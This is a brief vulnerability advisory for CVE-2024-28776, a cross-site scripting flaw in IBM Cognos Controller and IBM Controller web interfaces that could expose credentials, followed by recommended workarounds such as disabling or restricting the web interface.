CVE-2024-28776

Name of the Vulnerable Software and Affected Versions IBM Cognos Controller versions 11.0.0 through 11.0.1 FP3 IBM Controller version 11.1.0

Description This issue allows users to embed arbitrary JavaScript code in the Web UI, altering the intended functionality and potentially leading to credentials disclosure within a trusted session. The vulnerability enables the incorporation of arbitrary JavaScript code, thus changing the expected behavior of the web interface.

Recommendations For IBM Cognos Controller versions 11.0.0 through 11.0.1 FP3, consider disabling the web interface functionality until a patch is available to prevent potential cross-site scripting attacks. For IBM Controller version 11.1.0, restrict access to the web interface to minimize the risk of exploitation. As a temporary workaround, avoid using the web interface for sensitive operations until the issue is resolved.